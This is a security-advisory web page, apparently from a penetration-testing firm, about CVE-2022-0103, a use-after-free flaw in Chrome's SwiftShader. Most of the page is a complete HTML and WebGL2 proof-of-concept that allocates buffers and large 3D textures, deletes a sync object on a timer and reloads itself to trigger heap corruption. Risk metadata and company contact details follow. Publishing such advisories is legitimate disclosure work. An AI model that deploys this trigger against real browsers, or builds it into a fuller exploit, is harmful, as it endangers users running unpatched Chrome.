Back to Security Advisories

CVE-2022-0103

HIGH Severity

Use after free in SwiftShader in Google Chrome prior to 97.0.4692.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

 Proof of Concept 
<!DOCTYPE html>
<body>
<script>
(function () {
    'use strict';

    window.getShaderSource = function(id) {
        return document.getElementById(id).textContent.replace(/^\s+|\s+$/g, '');
    };

    function createShader(gl, source, type) {
        var shader = gl.createShader(type);
        gl.shaderSource(shader, source);
        gl.compileShader(shader);
        return shader;
    }

    window.createProgram = function(gl, vertexShaderSource, fragmentShaderSource) {
        var program = gl.createProgram();
        var vshader = createShader(gl, vertexShaderSource, gl.VERTEX_SHADER);
        var fshader = createShader(gl, fragmentShaderSource, gl.FRAGMENT_SHADER);
        gl.attachShader(program, vshader);
        gl.deleteShader(vshader);
        gl.attachShader(program, fshader);
        gl.deleteShader(fshader);
        gl.linkProgram(program);
		gl.useProgram(program);

        return program;
    };

})();
</script>
<canvas id="canvas1" width="512" height="512"></canvas>

<script id='2d-vertex-shader' type='x-shader/x-vertex'>#version 300 es
void main(){}
</script>
    
<script id='2d-fragment-shader' type='x-shader/x-fragment'>#version 300 es
precision mediump float;
out vec4 color;
void main() {color = vec4(1,1,1,1);}
</script>

<script>
async function genWebGL2(){

var canvas = document.getElementById('canvas1');
var gl1 = canvas1.getContext('webgl2');
var program1 = createProgram(gl1, getShaderSource('2d-vertex-shader'), getShaderSource('2d-fragment-shader'));

var buffer1 = gl1.createBuffer();
gl1.bindBuffer(gl1.ARRAY_BUFFER, buffer1);
var buffer89555 = gl1.createBuffer();
gl1.bindBuffer(gl1.ELEMENT_ARRAY_BUFFER, buffer89555);
gl1.bufferData( gl1.ELEMENT_ARRAY_BUFFER,  new Uint16Array(4), gl1.STATIC_READ, 0, 0);
gl1.bufferData( gl1.ARRAY_BUFFER,  new Uint16Array(4), gl1.STATIC_COPY, 0, 0);
gl1.drawElements(gl1.LINE_STRIP, 4, gl1.UNSIGNED_BYTE,0);

gl1.flush();

var texture1 = gl1.createTexture();
gl1.bindTexture(gl1.TEXTURE_3D, texture1);
imgData = new Uint8Array(64*64*64*4);
gl1.texImage3D(gl1.TEXTURE_3D, 0, gl1.RGB8, 64, 64, 64, 0, gl1.RGB, gl1.UNSIGNED_BYTE, imgData);
gl1.generateMipmap(gl1.TEXTURE_3D);
gl1.copyTexSubImage3D( gl1.TEXTURE_3D, 0, 0, 0, 0, 0, 0, 64, 64 );

var texture1 = gl1.createTexture();
gl1.bindTexture(gl1.TEXTURE_3D, texture1);
imgData = new Uint8Array(256*256*256*4);
gl1.texImage3D(gl1.TEXTURE_3D, 0, gl1.RGBA8, 256, 256, 256, 0, gl1.RGBA, gl1.UNSIGNED_BYTE, imgData);

var sync1 = gl1.fenceSync(gl1.SYNC_GPU_COMMANDS_COMPLETE, 0);
gl1.clientWaitSync(sync1, 0, 0);
setTimeout(function(){gl1.deleteSync(sync1);}, 10);

var texture1 = gl1.createTexture();
gl1.texImage3D(gl1.TEXTURE_3D, 0, gl1.RGBA8, 256, 256, 256, 0, gl1.RGBA, gl1.UNSIGNED_BYTE, imgData);
}

genWebGL2().then(() => location.reload());
</script>
</body>
</html>

Risk Information

CVE ID
CVE-2022-0103

Vendor
Google

Product
Chrome

CVSS SCORE
8.8

Advisories
Vendor Advisory
NVD


1-8-309, Ronald Ross Road, Begumpet, Hyderabad Telangana, India – 500003

Talk to an Expert

Let’s engage in a strategic discussion on adding value to your organizations security. For prompt action, bypass the wait—connect with us directly. Your objectives, our priority.

+91​ ​8989 1337 37
+91​ ​8989 1337 37

Quick Links

Web Application Penetration Testing
Mobile Application Penetration Testing
Red Team Assessment
Social Engineering Assessment




©2025 Krash Consulting, All rights reserved